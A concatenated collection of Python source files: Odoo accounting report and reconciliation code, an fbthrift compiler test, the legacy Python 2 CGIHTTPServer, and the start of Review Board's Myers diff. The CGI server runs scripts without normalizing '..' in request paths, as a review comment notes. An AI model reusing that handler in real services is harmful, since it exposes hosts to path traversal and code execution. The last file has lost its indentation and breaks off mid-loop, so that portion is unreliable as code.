# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
class report_print_check(report_sxw.rml_parse):
    # Legacy RML parser preparing the data used by the check-printing
    # report template (exposes get_lines/fill_stars to the template).

    def __init__(self, cr, uid, name, context):
        super(report_print_check, self).__init__(cr, uid, name, context)
        self.number_lines = 0
        self.number_add = 0
        self.localcontext.update({
            'time': time,
            'get_lines': self.get_lines,
            'fill_stars' : self.fill_stars,
        })

    def fill_stars(self, amount):
        # Pad the amount-in-words with '*' so the printed line reaches a
        # fixed width and cannot be extended after printing.
        if len(amount) < 100:
            stars = 100 - len(amount)
            return ' '.join([amount,'*'*stars])
        else: return amount

    def get_lines(self, voucher_lines):
        # Build at most 10 row dicts (one per voucher line) for the
        # check stub table.
        result = []
        self.number_lines = len(voucher_lines)
        # NOTE(review): because the range is capped at number_lines, the
        # else branch below is unreachable; it looks like the intent was
        # range(0, 10) to pad short stubs with empty rows — confirm
        # against the report template before changing.
        for i in range(0, min(10,self.number_lines)):
            if i < self.number_lines:
                res = {
                    'date_due' : voucher_lines[i].date_due,
                    'name' : voucher_lines[i].name,
                    'amount_original' : voucher_lines[i].amount_original and voucher_lines[i].amount_original or False,
                    'amount_unreconciled' : voucher_lines[i].amount_unreconciled and voucher_lines[i].amount_unreconciled or False,
                    'amount' : voucher_lines[i].amount and voucher_lines[i].amount or False,
                }
            else :
                res = {
                    'date_due' : False,
                    'name' : False,
                    'amount_original' : False,
                    'amount_due' : False,
                    'amount' : False,
                }
            result.append(res)
        return result
class report_check(osv.AbstractModel):
    # Report registration shim: binds the
    # 'account_check_writing.report_check' template to the legacy
    # rml_parse-based parser (report_print_check) through the
    # 'report.abstract_report' wrapper.  All attributes below are the
    # framework's declarative interface; there is no behavior here.
    _name = 'report.account_check_writing.report_check'
    _inherit = 'report.abstract_report'
    _template = 'account_check_writing.report_check'
    _wrapped_report_class = report_print_check
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
camptocamp/odoo | addons/account/wizard/account_reconcile_partner_process.py | 385 | 5775 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_partner_reconcile_process(osv.osv_memory):
    # Transient (wizard) model that drives the partner-by-partner
    # reconciliation workflow: it shows how many partners remain, how many
    # were processed today, and proposes the next partner to reconcile.
    # NOTE(review): 'Reconcilation' below is a typo in the user-visible
    # description string; left as-is because it is runtime text.
    _name = 'account.partner.reconcile.process'
    _description = 'Reconcilation Process partner by partner'
    def _get_to_reconcile(self, cr, uid, context=None):
        # Count partners that still have BOTH unreconciled debit and credit
        # lines on reconcilable accounts and were not already reconciled
        # today (last_reconciliation_date older than today or NULL).
        cr.execute("""
             SELECT p_id FROM (SELECT l.partner_id as p_id, SUM(l.debit) AS debit, SUM(l.credit) AS credit
                                FROM account_move_line AS l LEFT JOIN account_account a ON (l.account_id = a.id)
                                    LEFT JOIN res_partner p ON (p.id = l.partner_id)
                                WHERE a.reconcile = 't'
                                    AND l.reconcile_id IS NULL
                                    AND (%s > to_char(p.last_reconciliation_date, 'YYYY-MM-DD') OR p.last_reconciliation_date IS NULL )
                                    AND l.state <> 'draft'
                                GROUP BY l.partner_id) AS tmp
                                WHERE debit > 0
                                AND credit > 0
               """,(time.strftime('%Y-%m-%d'),)
        )
        # -1: the partner currently being processed is presented as already
        # reconciled (see the 'to_reconcile' field help below).
        return len(map(lambda x: x[0], cr.fetchall())) - 1
    def _get_today_reconciled(self, cr, uid, context=None):
        # Count partners whose last_reconciliation_date is today and who
        # still carry unreconciled, non-draft move lines.
        cr.execute(
            "SELECT l.partner_id " \
            "FROM account_move_line AS l LEFT JOIN res_partner p ON (p.id = l.partner_id) " \
            "WHERE l.reconcile_id IS NULL " \
            "AND %s = to_char(p.last_reconciliation_date, 'YYYY-MM-DD') " \
            "AND l.state <> 'draft' " \
            "GROUP BY l.partner_id ",(time.strftime('%Y-%m-%d'),)
        )
        # +1: the current partner is counted as already processed (see the
        # 'today_reconciled' field help below).
        return len(map(lambda x: x[0], cr.fetchall())) + 1
    def _get_partner(self, cr, uid, context=None):
        # Default for 'next_partner_id': first candidate returned by the
        # move-line model's own ordering, or False when none remain.
        move_line_obj = self.pool.get('account.move.line')
        partner = move_line_obj.list_partners_to_reconcile(cr, uid, context=context)
        if not partner:
            return False
        return partner[0][0]
    def data_get(self, cr, uid, to_reconcile, today_reconciled, context=None):
        # Progress as a percentage: today_reconciled / (remaining + done),
        # guarded against division by zero with the `or 1.0` fallback.
        return {'progress': (100 / (float(to_reconcile + today_reconciled) or 1.0)) * today_reconciled}
    def default_get(self, cr, uid, fields, context=None):
        # Augment the standard defaults with the derived 'progress' value
        # once both counters are available.
        res = super(account_partner_reconcile_process, self).default_get(cr, uid, fields, context=context)
        if 'to_reconcile' in res and 'today_reconciled' in res:
            data = self.data_get(cr, uid, res['to_reconcile'], res['today_reconciled'], context)
            res.update(data)
        return res
    def next_partner(self, cr, uid, ids, context=None):
        # Stamp the active record's partner with today's date so it drops
        # out of the "to reconcile" pool, then close the wizard window.
        if context is None:
            context = {}
        move_line_obj = self.pool.get('account.move.line')
        res_partner_obj = self.pool.get('res.partner')
        partner_id = move_line_obj.read(cr, uid, context['active_id'], ['partner_id'])['partner_id']
        if partner_id:
            res_partner_obj.write(cr, uid, partner_id[0], {'last_reconciliation_date': time.strftime('%Y-%m-%d')}, context)
        #TODO: we have to find a way to update the context of the current tab (we could open a new tab with the context but it's not really handy)
        #TODO: remove that comments when the client side dev is done
        return {'type': 'ir.actions.act_window_close'}
    _columns = {
        'to_reconcile': fields.float('Remaining Partners', readonly=True, help='This is the remaining partners for who you should check if there is something to reconcile or not. This figure already count the current partner as reconciled.'),
        'today_reconciled': fields.float('Partners Reconciled Today', readonly=True, help='This figure depicts the total number of partners that have gone throught the reconciliation process today. The current partner is counted as already processed.'),
        'progress': fields.float('Progress', readonly=True, help='Shows you the progress made today on the reconciliation process. Given by \nPartners Reconciled Today \ (Remaining Partners + Partners Reconciled Today)'),
        'next_partner_id': fields.many2one('res.partner', 'Next Partner to Reconcile', readonly=True, help='This field shows you the next partner that will be automatically chosen by the system to go through the reconciliation process, based on the latest day it have been reconciled.'), # TODO: remove the readonly=True when teh client side will allow to update the context of existing tab, so that the user can change this value if he doesn't want to follow openerp proposal
    }
    _defaults = {
        'to_reconcile': _get_to_reconcile,
        'today_reconciled': _get_today_reconciled,
        'next_partner_id': _get_partner,
    }
| agpl-3.0 |
LinusU/fbthrift | thrift/compiler/test/compiler_test.py | 1 | 4049 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import pkg_resources
import re
import unittest
import shlex
import shutil
import subprocess
import sys
import tempfile
import traceback
def ascend_find_exe(path, target):
    """Walk up the directory tree from *path* looking for an executable
    file named *target*; return its full path, or None at the filesystem
    root if nothing was found.  A non-directory *path* is replaced by its
    containing directory first."""
    current = path if os.path.isdir(path) else os.path.dirname(path)
    while True:
        candidate = os.path.join(current, target)
        if os.access(candidate, os.X_OK):
            return candidate
        parent = os.path.dirname(current)
        # At the root, dirname() is a fixed point -- stop searching.
        if os.path.samefile(parent, current):
            return None
        current = parent
def read_file(path):
    """Return the entire contents of the text file at *path*."""
    with open(path, 'r') as stream:
        return stream.read()
def write_file(path, content):
    """Replace the contents of the file at *path* with *content*."""
    with open(path, 'w') as stream:
        stream.write(content)
def read_resource(path):
    # Read a data file bundled with this test package (e.g. fixture
    # sources and the MANIFEST) via setuptools' pkg_resources, resolving
    # *path* relative to this module.
    return pkg_resources.resource_string(__name__, path)
def read_lines(path):
    """Return the lines of the text file at *path*, keeping line endings."""
    with open(path, 'r') as stream:
        return list(stream)
def mkdir_p(path, mode):
    """Create directory *path* (with any missing parents) using *mode*.

    A no-op when *path* already exists as a directory, mirroring
    ``mkdir -p``.
    """
    if os.path.isdir(path):
        return
    os.makedirs(path, mode)
def parse_manifest(raw):
    """Parse MANIFEST text into ``{fixture_name: [relative_path, ...]}``.

    Each input line has the form ``<fixture>/<path-within-fixture>``; the
    split happens on the first '/' only, so deeper paths stay intact.
    """
    manifest = {}
    for entry in raw.splitlines():
        fixture, filename = entry.split('/', 1)
        manifest.setdefault(fixture, []).append(filename)
    return manifest
# Module-level setup, executed at import time.
# sys.argv[0] is the path of the running test script; walk upward from it
# to find the `thrift` compiler binary built alongside these tests.
exe = os.path.join(os.getcwd(), sys.argv[0])
thrift = ascend_find_exe(exe, 'thrift')
fixtureDir = 'fixtures'
# The MANIFEST resource lists one '<fixture>/<file>' entry per expected
# source/generated file; one test method is created per fixture name.
manifest = parse_manifest(read_resource(os.path.join(fixtureDir, 'MANIFEST')))
fixtureNames = manifest.keys()
class CompilerTest(unittest.TestCase):
    """Golden-file test: run the thrift compiler on each fixture and diff
    the generated output against the recorded fixture files."""
    # Shown when generated output no longer matches the recorded fixtures,
    # with instructions on how to regenerate them.
    MSG = " ".join([
        "One or more fixtures are out of sync with the thrift compiler.",
        "To sync them, build thrift and then run:",
        "`thrift/compiler/test/build_fixtures <build-dir>`, where",
        "<build-dir> is a path where the program `thrift/compiler/thrift`",
        "may be found.",
    ])
    def setUp(self):
        # Each test runs in its own scratch directory, removed on cleanup
        # (ignore_errors=True via the third addCleanup argument).
        tmp = tempfile.mkdtemp()
        self.addCleanup(shutil.rmtree, tmp, True)
        self.tmp = tmp
        self.maxDiff = None
    def runTest(self, name):
        """Compile fixture *name* in the scratch dir and compare results."""
        fixtureChildDir = os.path.join(fixtureDir, name)
        cmdc = read_resource(os.path.join(fixtureChildDir, 'cmd'))
        write_file(os.path.join(self.tmp, "cmd"), cmdc)
        # Copy the fixture's input sources ('src/...') into the scratch dir.
        for fn in manifest[name]:
            if fn.startswith('src/'):
                out = os.path.join(self.tmp, fn)
                mkdir_p(os.path.dirname(out), 0o700)
                srcc = read_resource(os.path.join(fixtureChildDir, fn))
                write_file(out, srcc)
        # Each line of 'cmd' is one generator invocation for `thrift --gen`.
        cmds = read_lines(os.path.join(self.tmp, 'cmd'))
        for cmd in cmds:
            args = shlex.split(cmd.strip())
            # C++ generators get an extra include_prefix option pointing at
            # the fixture's canonical in-tree path; use ':' to start the
            # option list or ',' to append to an existing one.
            if args[0].startswith("cpp"):
                path = os.path.join("thrift/compiler/test/fixtures", name)
                extra = "include_prefix=" + path
                join = "," if ":" in args[0] else ":"
                args[0] = args[0] + join + extra
            subprocess.check_call(
                [thrift, '-r', '--gen'] + args,
                cwd=self.tmp,
                close_fds=True,
            )
        # Collect every file now present in the scratch dir; strip the
        # leading './' component so paths match the manifest entries.
        gens = subprocess.check_output(
            ["find", ".", "-type", "f"],
            cwd=self.tmp,
            close_fds=True,
        ).splitlines()
        gens = [gen.split('/', 1)[1] for gen in gens]
        try:
            self.assertEqual(sorted(gens), sorted(manifest[name]))
            for gen in gens:
                genc = read_file(os.path.join(self.tmp, gen))
                fixc = read_resource(os.path.join(fixtureChildDir, gen))
                self.assertMultiLineEqual(genc, fixc)
        except Exception as e:
            # Print regeneration instructions before re-raising the failure.
            print(self.MSG, file=sys.stderr)
            traceback.print_exc(file=sys.stderr)
            raise e
def add_fixture(klazz, name):
    """Attach a ``test_<name>`` method to *klazz* that runs fixture *name*.

    Non-alphanumeric characters in *name* are replaced by underscores so
    the attribute is a valid Python identifier.
    """
    safe = re.sub('[^0-9a-zA-Z]', '_', name)

    def test_method(self):
        self.runTest(name)

    # str() keeps __name__ a native str under `unicode_literals` on py2.
    test_method.__name__ = str('test_' + safe)
    setattr(klazz, test_method.__name__, test_method)
# Register one generated test method on CompilerTest per fixture listed
# in the MANIFEST, so unittest discovery sees an individual test for each.
for name in fixtureNames:
    add_fixture(CompilerTest, name)
| apache-2.0 |
barbarubra/Don-t-know-What-i-m-doing. | python/src/Lib/CGIHTTPServer.py | 59 | 12687 | """CGI-savvy HTTP Server.
This module builds on SimpleHTTPServer by implementing GET and POST
requests to cgi-bin scripts.
If the os.fork() function is not present (e.g. on Windows),
os.popen2() is used as a fallback, with slightly altered semantics; if
that function is not present either (e.g. on Macintosh), only Python
scripts are supported, and they are executed by the current process.
In all cases, the implementation is intentionally naive -- all
requests are executed sychronously.
SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL
-- it may execute arbitrary Python code or external programs.
Note that status code 200 is sent prior to execution of a CGI script, so
scripts cannot send other status codes such as 302 (redirect).
"""
__version__ = "0.4"
__all__ = ["CGIHTTPRequestHandler"]
import os
import sys
import urllib
import BaseHTTPServer
import SimpleHTTPServer
import select
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """Complete HTTP server with GET, HEAD and POST commands.
    GET and HEAD also support running CGI scripts.
    The POST command is *only* implemented for CGI scripts.
    """
    # Determine platform specifics
    have_fork = hasattr(os, 'fork')
    have_popen2 = hasattr(os, 'popen2')
    have_popen3 = hasattr(os, 'popen3')
    # Make rfile unbuffered -- we need to read one line and then pass
    # the rest to a subprocess, so we can't use buffered input.
    rbufsize = 0
    def do_POST(self):
        """Serve a POST request.
        This is only implemented for CGI scripts.
        """
        if self.is_cgi():
            self.run_cgi()
        else:
            self.send_error(501, "Can only POST to CGI scripts")
    def send_head(self):
        """Version of send_head that support CGI scripts"""
        if self.is_cgi():
            return self.run_cgi()
        else:
            return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
    def is_cgi(self):
        """Test whether self.path corresponds to a CGI script,
        and return a boolean.
        This function sets self.cgi_info to a tuple (dir, rest)
        when it returns True, where dir is the directory part before
        the CGI script name. Note that rest begins with a
        slash if it is not empty.
        The default implementation tests whether the path
        begins with one of the strings in the list
        self.cgi_directories (and the next character is a '/'
        or the end of the string).
        """
        # NOTE(review): this is a plain string-prefix comparison;
        # self.path is not normalized here, so '..' components are not
        # collapsed before the check.  Later Python versions collapse the
        # URL path first -- verify before exposing to untrusted clients.
        path = self.path
        for x in self.cgi_directories:
            i = len(x)
            if path[:i] == x and (not path[i:] or path[i] == '/'):
                self.cgi_info = path[:i], path[i+1:]
                return True
        return False
    # Request paths under these prefixes are treated as CGI scripts.
    cgi_directories = ['/cgi-bin', '/htbin']
    def is_executable(self, path):
        """Test whether argument path is an executable file."""
        return executable(path)
    def is_python(self, path):
        """Test whether argument path is a Python script."""
        head, tail = os.path.splitext(path)
        return tail.lower() in (".py", ".pyw")
    def run_cgi(self):
        """Execute a CGI script."""
        # Walk forward through the path as long as each component is a
        # real directory, so nested script dirs resolve correctly.
        path = self.path
        dir, rest = self.cgi_info
        i = path.find('/', len(dir) + 1)
        while i >= 0:
            nextdir = path[:i]
            nextrest = path[i+1:]
            scriptdir = self.translate_path(nextdir)
            if os.path.isdir(scriptdir):
                dir, rest = nextdir, nextrest
                i = path.find('/', len(dir) + 1)
            else:
                break
        # find an explicit query string, if present.
        i = rest.rfind('?')
        if i >= 0:
            rest, query = rest[:i], rest[i+1:]
        else:
            query = ''
        # dissect the part after the directory name into a script name &
        # a possible additional path, to be stored in PATH_INFO.
        i = rest.find('/')
        if i >= 0:
            script, rest = rest[:i], rest[i:]
        else:
            script, rest = rest, ''
        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(404, "No such CGI script (%r)" % scriptname)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(403, "CGI script is not a plain file (%r)" %
                            scriptname)
            return
        ispy = self.is_python(scriptname)
        if not ispy:
            # Non-Python scripts need both a subprocess mechanism and the
            # executable bit; Python scripts are run in-process if needed.
            if not (self.have_fork or self.have_popen2 or self.have_popen3):
                self.send_error(403, "CGI script is not a Python script (%r)" %
                                scriptname)
                return
            if not self.is_executable(scriptfile):
                self.send_error(403, "CGI script is not executable (%r)" %
                                scriptname)
                return
        # Reference: http://hoohoo.ncsa.uiuc.edu/cgi/env.html
        # XXX Much of the following could be prepared ahead of time!
        env = {}
        env['SERVER_SOFTWARE'] = self.version_string()
        env['SERVER_NAME'] = self.server.server_name
        env['GATEWAY_INTERFACE'] = 'CGI/1.1'
        env['SERVER_PROTOCOL'] = self.protocol_version
        env['SERVER_PORT'] = str(self.server.server_port)
        env['REQUEST_METHOD'] = self.command
        uqrest = urllib.unquote(rest)
        env['PATH_INFO'] = uqrest
        env['PATH_TRANSLATED'] = self.translate_path(uqrest)
        env['SCRIPT_NAME'] = scriptname
        if query:
            env['QUERY_STRING'] = query
        host = self.address_string()
        if host != self.client_address[0]:
            env['REMOTE_HOST'] = host
        env['REMOTE_ADDR'] = self.client_address[0]
        authorization = self.headers.getheader("authorization")
        if authorization:
            # Decode HTTP Basic credentials into AUTH_TYPE / REMOTE_USER.
            authorization = authorization.split()
            if len(authorization) == 2:
                import base64, binascii
                env['AUTH_TYPE'] = authorization[0]
                if authorization[0].lower() == "basic":
                    try:
                        authorization = base64.decodestring(authorization[1])
                    except binascii.Error:
                        pass
                    else:
                        authorization = authorization.split(':')
                        if len(authorization) == 2:
                            env['REMOTE_USER'] = authorization[0]
        # XXX REMOTE_IDENT
        if self.headers.typeheader is None:
            env['CONTENT_TYPE'] = self.headers.type
        else:
            env['CONTENT_TYPE'] = self.headers.typeheader
        length = self.headers.getheader('content-length')
        if length:
            env['CONTENT_LENGTH'] = length
        referer = self.headers.getheader('referer')
        if referer:
            env['HTTP_REFERER'] = referer
        accept = []
        # Merge (possibly folded/continued) Accept headers into one value.
        for line in self.headers.getallmatchingheaders('accept'):
            if line[:1] in "\t\n\r ":
                accept.append(line.strip())
            else:
                accept = accept + line[7:].split(',')
        env['HTTP_ACCEPT'] = ','.join(accept)
        ua = self.headers.getheader('user-agent')
        if ua:
            env['HTTP_USER_AGENT'] = ua
        co = filter(None, self.headers.getheaders('cookie'))
        if co:
            env['HTTP_COOKIE'] = ', '.join(co)
        # XXX Other HTTP_* headers
        # Since we're setting the env in the parent, provide empty
        # values to override previously set values
        for k in ('QUERY_STRING', 'REMOTE_HOST', 'CONTENT_LENGTH',
                  'HTTP_USER_AGENT', 'HTTP_COOKIE', 'HTTP_REFERER'):
            env.setdefault(k, "")
        # The CGI environment is applied to this process's own environment;
        # the forked child below inherits it through os.execve(os.environ).
        os.environ.update(env)
        self.send_response(200, "Script output follows")
        decoded_query = query.replace('+', ' ')
        if self.have_fork:
            # Unix -- fork as we should
            args = [script]
            if '=' not in decoded_query:
                args.append(decoded_query)
            nobody = nobody_uid()
            self.wfile.flush() # Always flush before forking
            pid = os.fork()
            if pid != 0:
                # Parent
                pid, sts = os.waitpid(pid, 0)
                # throw away additional data [see bug #427345]
                while select.select([self.rfile], [], [], 0)[0]:
                    if not self.rfile.read(1):
                        break
                if sts:
                    self.log_error("CGI script exit status %#x", sts)
                return
            # Child
            try:
                try:
                    # Drop privileges to 'nobody' when possible.
                    os.setuid(nobody)
                except os.error:
                    pass
                os.dup2(self.rfile.fileno(), 0)
                os.dup2(self.wfile.fileno(), 1)
                os.execve(scriptfile, args, os.environ)
            except:
                self.server.handle_error(self.request, self.client_address)
                os._exit(127)
        elif self.have_popen2 or self.have_popen3:
            # Windows -- use popen2 or popen3 to create a subprocess
            import shutil
            if self.have_popen3:
                popenx = os.popen3
            else:
                popenx = os.popen2
            cmdline = scriptfile
            if self.is_python(scriptfile):
                interp = sys.executable
                if interp.lower().endswith("w.exe"):
                    # On Windows, use python.exe, not pythonw.exe
                    interp = interp[:-5] + interp[-4:]
                cmdline = "%s -u %s" % (interp, cmdline)
            if '=' not in query and '"' not in query:
                cmdline = '%s "%s"' % (cmdline, query)
            self.log_message("command: %s", cmdline)
            try:
                nbytes = int(length)
            except (TypeError, ValueError):
                nbytes = 0
            files = popenx(cmdline, 'b')
            fi = files[0]
            fo = files[1]
            if self.have_popen3:
                fe = files[2]
            if self.command.lower() == "post" and nbytes > 0:
                data = self.rfile.read(nbytes)
                fi.write(data)
            # throw away additional data [see bug #427345]
            while select.select([self.rfile._sock], [], [], 0)[0]:
                if not self.rfile._sock.recv(1):
                    break
            fi.close()
            shutil.copyfileobj(fo, self.wfile)
            if self.have_popen3:
                errors = fe.read()
                fe.close()
                if errors:
                    self.log_error('%s', errors)
            sts = fo.close()
            if sts:
                self.log_error("CGI script exit status %#x", sts)
            else:
                self.log_message("CGI script exited OK")
        else:
            # Other O.S. -- execute script in this process
            save_argv = sys.argv
            save_stdin = sys.stdin
            save_stdout = sys.stdout
            save_stderr = sys.stderr
            try:
                save_cwd = os.getcwd()
                try:
                    sys.argv = [scriptfile]
                    if '=' not in decoded_query:
                        sys.argv.append(decoded_query)
                    sys.stdout = self.wfile
                    sys.stdin = self.rfile
                    execfile(scriptfile, {"__name__": "__main__"})
                finally:
                    sys.argv = save_argv
                    sys.stdin = save_stdin
                    sys.stdout = save_stdout
                    sys.stderr = save_stderr
                    os.chdir(save_cwd)
            except SystemExit, sts:
                self.log_error("CGI script exit status %s", str(sts))
            else:
                self.log_message("CGI script exited OK")
# Cached uid of the unprivileged 'nobody' account (None until first lookup).
nobody = None


def nobody_uid():
    """Return the uid of the 'nobody' account, caching the result.

    Returns -1 when the pwd module is unavailable (non-Unix platforms);
    if no 'nobody' entry exists, falls back to one past the highest uid
    in the password database.

    Fix: the cache check is now ``is not None`` instead of truthiness, so
    a legitimately-cached uid of 0 would no longer force a re-lookup on
    every call.
    """
    global nobody
    if nobody is not None:
        return nobody
    try:
        import pwd
    except ImportError:
        return -1
    try:
        nobody = pwd.getpwnam('nobody')[2]
    except KeyError:
        nobody = 1 + max(map(lambda x: x[2], pwd.getpwall()))
    return nobody
def executable(path):
    """Return True if *path* exists and has any execute bit set.

    Checks the stat mode bits directly (not os.access), so the answer is
    about the file's permissions, not the current user's rights.
    """
    try:
        st = os.stat(path)
    except os.error:
        return False
    # 0o111 = owner/group/other execute bits.  The modern octal literal is
    # valid on Python 2.6+ and Python 3, unlike the original 0111 form,
    # which is a syntax error on Python 3.
    return st.st_mode & 0o111 != 0
def test(HandlerClass = CGIHTTPRequestHandler,
         ServerClass = BaseHTTPServer.HTTPServer):
    # Start a CGI-capable HTTP server; argument parsing (port) and the
    # serve loop are delegated to SimpleHTTPServer.test().
    SimpleHTTPServer.test(HandlerClass, ServerClass)
# Allow running this module directly as a standalone CGI HTTP server.
if __name__ == '__main__':
    test()
| apache-2.0 |
KnowNo/reviewboard | reviewboard/diffviewer/myersdiff.py | 9 | 25557 | from __future__ import unicode_literals
from django.utils.six.moves import range
from reviewboard.diffviewer.differ import Differ, DiffCompatVersion
class MyersDiffer(Differ):
"""
An implementation of Eugene Myers's O(ND) Diff algorithm based on GNU diff.
"""
SNAKE_LIMIT = 20
DISCARD_NONE = 0
DISCARD_FOUND = 1
DISCARD_CANCEL = 2
# The Myers diff algorithm effectively turns the diff problem into a graph
# search. It works by finding the "shortest middle snake," which
class DiffData:
def __init__(self, data):
self.data = data
self.length = len(data)
self.modified = {}
self.undiscarded = []
self.undiscarded_lines = 0
self.real_indexes = []
def __init__(self, *args, **kwargs):
super(MyersDiffer, self).__init__(*args, **kwargs)
self.code_table = {}
self.last_code = 0
self.a_data = self.b_data = None
self.minimal_diff = False
self.interesting_line_table = {}
# SMS State
self.max_lines = 0
self.fdiag = None
self.bdiag = None
def ratio(self):
self._gen_diff_data()
a_equals = self.a_data.length - len(self.a_data.modified)
b_equals = self.b_data.length - len(self.b_data.modified)
return 1.0 * (a_equals + b_equals) / \
(self.a_data.length + self.b_data.length)
def get_opcodes(self):
"""
Generator that returns opcodes representing the contents of the
diff.
The resulting opcodes are in the format of
(tag, i1, i2, j1, j2)
"""
self._gen_diff_data()
if self.a_data.length == 0 and self.b_data.length == 0:
# There's nothing to process or yield. Bail.
return
a_line = b_line = 0
last_group = None
# Go through the entire set of lines on both the old and new files
while a_line < self.a_data.length or b_line < self.b_data.length:
a_start = a_line
b_start = b_line
if a_line < self.a_data.length and \
not self.a_data.modified.get(a_line, False) and \
b_line < self.b_data.length and \
not self.b_data.modified.get(b_line, False):
# Equal
a_changed = b_changed = 1
tag = "equal"
a_line += 1
b_line += 1
else:
# Deleted, inserted or replaced
# Count every old line that's been modified, and the
# remainder of old lines if we've reached the end of the new
# file.
while (a_line < self.a_data.length and
(b_line >= self.b_data.length or
self.a_data.modified.get(a_line, False))):
a_line += 1
# Count every new line that's been modified, and the
# remainder of new lines if we've reached the end of the old
# file.
while (b_line < self.b_data.length and
(a_line >= self.a_data.length or
self.b_data.modified.get(b_line, False))):
b_line += 1
a_changed = a_line - a_start
b_changed = b_line - b_start
assert a_start < a_line or b_start < b_line
assert a_changed != 0 or b_changed != 0
if a_changed == 0 and b_changed > 0:
tag = "insert"
elif a_changed > 0 and b_changed == 0:
tag = "delete"
elif a_changed > 0 and b_changed > 0:
tag = "replace"
if a_changed != b_changed:
if a_changed > b_changed:
a_line -= a_changed - b_changed
elif a_changed < b_changed:
b_line -= b_changed - a_changed
a_changed = b_changed = min(a_changed, b_changed)
if last_group and last_group[0] == tag:
last_group = (tag,
last_group[1], last_group[2] + a_changed,
last_group[3], last_group[4] + b_changed)
else:
if last_group:
yield last_group
last_group = (tag, a_start, a_start + a_changed,
b_start, b_start + b_changed)
if not last_group:
last_group = ("equal", 0, self.a_data.length,
0, self.b_data.length)
yield last_group
def _gen_diff_data(self):
"""
Generate all the diff data needed to return opcodes or the diff ratio.
This is only called once during the liftime of a MyersDiffer instance.
"""
if self.a_data and self.b_data:
return
self.a_data = self.DiffData(self._gen_diff_codes(self.a, False))
self.b_data = self.DiffData(self._gen_diff_codes(self.b, True))
self._discard_confusing_lines()
self.max_lines = (self.a_data.undiscarded_lines +
self.b_data.undiscarded_lines + 3)
vector_size = (self.a_data.undiscarded_lines +
self.b_data.undiscarded_lines + 3)
self.fdiag = [0] * vector_size
self.bdiag = [0] * vector_size
self.downoff = self.upoff = self.b_data.undiscarded_lines + 1
self._lcs(0, self.a_data.undiscarded_lines,
0, self.b_data.undiscarded_lines,
self.minimal_diff)
self._shift_chunks(self.a_data, self.b_data)
self._shift_chunks(self.b_data, self.a_data)
def _gen_diff_codes(self, lines, is_modified_file):
"""
Converts all unique lines of text into unique numbers. Comparing
lists of numbers is faster than comparing lists of strings.
"""
codes = []
linenum = 0
if is_modified_file:
interesting_lines = self.interesting_lines[1]
else:
interesting_lines = self.interesting_lines[0]
for line in lines:
# TODO: Handle ignoring/triming spaces, ignoring casing, and
# special hooks
raw_line = line
stripped_line = line.lstrip()
if self.ignore_space:
# We still want to show lines that contain only whitespace.
if len(stripped_line) > 0:
line = stripped_line
interesting_line_name = None
try:
code = self.code_table[line]
interesting_line_name = \
self.interesting_line_table.get(code, None)
except KeyError:
# This is a new, unrecorded line, so mark it and store it.
self.last_code += 1
code = self.last_code
self.code_table[line] = code
# Check to see if this is an interesting line that the caller
# wants recorded.
if stripped_line:
for name, regex in self.interesting_line_regexes:
if regex.match(raw_line):
interesting_line_name = name
self.interesting_line_table[code] = name
break
if interesting_line_name:
interesting_lines[interesting_line_name].append((linenum,
raw_line))
codes.append(code)
linenum += 1
return codes
def _find_sms(self, a_lower, a_upper, b_lower, b_upper, find_minimal):
"""
Finds the Shortest Middle Snake.
"""
down_vector = self.fdiag # The vector for the (0, 0) to (x, y) search
up_vector = self.bdiag # The vector for the (u, v) to (N, M) search
down_k = a_lower - b_lower # The k-line to start the forward search
up_k = a_upper - b_upper # The k-line to start the reverse search
odd_delta = (down_k - up_k) % 2 != 0
down_vector[self.downoff + down_k] = a_lower
up_vector[self.upoff + up_k] = a_upper
dmin = a_lower - b_upper
dmax = a_upper - b_lower
down_min = down_max = down_k
up_min = up_max = up_k
cost = 0
max_cost = max(256, self._very_approx_sqrt(self.max_lines * 4))
while True:
cost += 1
big_snake = False
if down_min > dmin:
down_min -= 1
down_vector[self.downoff + down_min - 1] = -1
else:
down_min += 1
if down_max < dmax:
down_max += 1
down_vector[self.downoff + down_max + 1] = -1
else:
down_max -= 1
# Extend the forward path
for k in range(down_max, down_min - 1, -2):
tlo = down_vector[self.downoff + k - 1]
thi = down_vector[self.downoff + k + 1]
if tlo >= thi:
x = tlo + 1
else:
x = thi
y = x - k
old_x = x
# Find the end of the furthest reaching forward D-path in
# diagonal k
while (x < a_upper and y < b_upper and
(self.a_data.undiscarded[x] ==
self.b_data.undiscarded[y])):
x += 1
y += 1
if odd_delta and up_min <= k <= up_max and \
up_vector[self.upoff + k] <= x:
return x, y, True, True
if x - old_x > self.SNAKE_LIMIT:
big_snake = True
down_vector[self.downoff + k] = x
# Extend the reverse path
if up_min > dmin:
up_min -= 1
up_vector[self.upoff + up_min - 1] = self.max_lines
else:
up_min += 1
if up_max < dmax:
up_max += 1
up_vector[self.upoff + up_max + 1] = self.max_lines
else:
up_max -= 1
for k in range(up_max, up_min - 1, -2):
tlo = up_vector[self.upoff + k - 1]
thi = up_vector[self.upoff + k + 1]
if tlo < thi:
x = tlo
else:
x = thi - 1
y = x - k
old_x = x
while (x > a_lower and y > b_lower and
(self.a_data.undiscarded[x - 1] ==
self.b_data.undiscarded[y - 1])):
x -= 1
